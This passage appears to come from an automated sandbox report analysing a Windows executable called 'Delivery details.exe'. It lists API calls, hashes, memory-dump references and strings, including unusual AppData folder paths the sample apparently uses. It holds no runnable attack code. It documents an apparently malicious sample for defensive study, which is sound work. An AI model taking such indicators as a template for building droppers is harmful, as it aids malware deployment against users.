                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                                                  • Instruction ID: cd8ab83c4a05c7db73f02061534639f879ad9b89da22042d3f94ff2104185c27
                                                                  • Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
                                                                  • Instruction Fuzzy Hash: 83C04CB5780200BAEA208BA49D85F0677545B90700F1449797640F50E0C674D460D66C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                  • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                  • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                  • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,0040413E), ref: 00404371
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                                                  • Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
                                                                  • Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
                                                                  • Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00405414: lstrlenW.KERNEL32(driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                    • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,driftsresultaters,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                    • Part of subcall function 00405414: lstrcatW.KERNEL32(driftsresultaters,00402EEC), ref: 0040546F
                                                                    • Part of subcall function 00405414: SetWindowTextW.USER32(driftsresultaters,driftsresultaters), ref: 00405481
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                    • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                    • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                    • Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                    • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                                    • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                                    • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2972824698-0
                                                                  • Opcode ID: 3929c64730fdf79a8eaed380047931b2911a654a3dac7ac27d03dad49a9be9ac
                                                                  • Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
                                                                  • Opcode Fuzzy Hash: 3929c64730fdf79a8eaed380047931b2911a654a3dac7ac27d03dad49a9be9ac
                                                                  • Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                                  • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                                  • DeleteObject.GDI32(00000000), ref: 00404E86
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                                  • GlobalFree.KERNEL32(?), ref: 004051C0
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405311
                                                                  • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                                  • ShowWindow.USER32(00000000), ref: 00405371
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                  • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                                  • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                  • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404863
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040488D
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040493E
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404949
                                                                  • lstrcmpiW.KERNEL32(: Completed,00423728,00000000,?,?), ref: 0040497B
                                                                  • lstrcatW.KERNEL32(?,: Completed), ref: 00404987
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404999
                                                                    • Part of subcall function 004059F6: GetDlgItemTextW.USER32(?,?,00000400,004049D0), ref: 00405A09
                                                                    • Part of subcall function 00406644: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                    • Part of subcall function 00406644: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                    • Part of subcall function 00406644: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                    • Part of subcall function 00406644: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Delivery details.exe",00403464,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                  • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A5C
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A77
                                                                    • Part of subcall function 00404BD0: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                    • Part of subcall function 00404BD0: wsprintfW.USER32 ref: 00404C7A
                                                                    • Part of subcall function 00404BD0: SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: (7B$: Completed$A$C:\Users\user\AppData\Roaming\akroterion\archmugwump
                                                                  • API String ID: 2624150263-4260037868
                                                                  • Opcode ID: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                  • Instruction ID: 8d8d1438250e4d518a9e2371570913b63a9457987511b3c3302aefac7d34506d
                                                                  • Opcode Fuzzy Hash: f04caca690f49e87266c44fb9cab88c370668c693f36f0659ef379fd8dc31e70
                                                                  • Instruction Fuzzy Hash: B3A184F1A00209ABDB119FA5CD45AAF77B8EF84314F14843BFA01B62D1D77C99418B6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured, xrefs: 004021BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured
                                                                  • API String ID: 542301482-3501646704
                                                                  • Opcode ID: 9e3054c51d9544b48ce293b00b3dd82ab5829c6137e4458993770c32d120825f
                                                                  • Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
                                                                  • Opcode Fuzzy Hash: 9e3054c51d9544b48ce293b00b3dd82ab5829c6137e4458993770c32d120825f
                                                                  • Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 9b41355f18f5e90db78f1a51746c29c7f738a4d28b78388705b0efaec490430a
                                                                  • Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
                                                                  • Opcode Fuzzy Hash: 9b41355f18f5e90db78f1a51746c29c7f738a4d28b78388705b0efaec490430a
                                                                  • Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404580
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404594
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045B1
                                                                  • GetSysColor.USER32(?), ref: 004045C2
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045D0
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045DE
                                                                  • lstrlenW.KERNEL32(?), ref: 004045E3
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045F0
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404605
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040465E
                                                                  • SendMessageW.USER32(00000000), ref: 00404665
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404690
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046D3
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004046E1
                                                                  • SetCursor.USER32(00000000), ref: 004046E4
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004046FD
                                                                  • SetCursor.USER32(00000000), ref: 00404700
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040472F
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404741
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
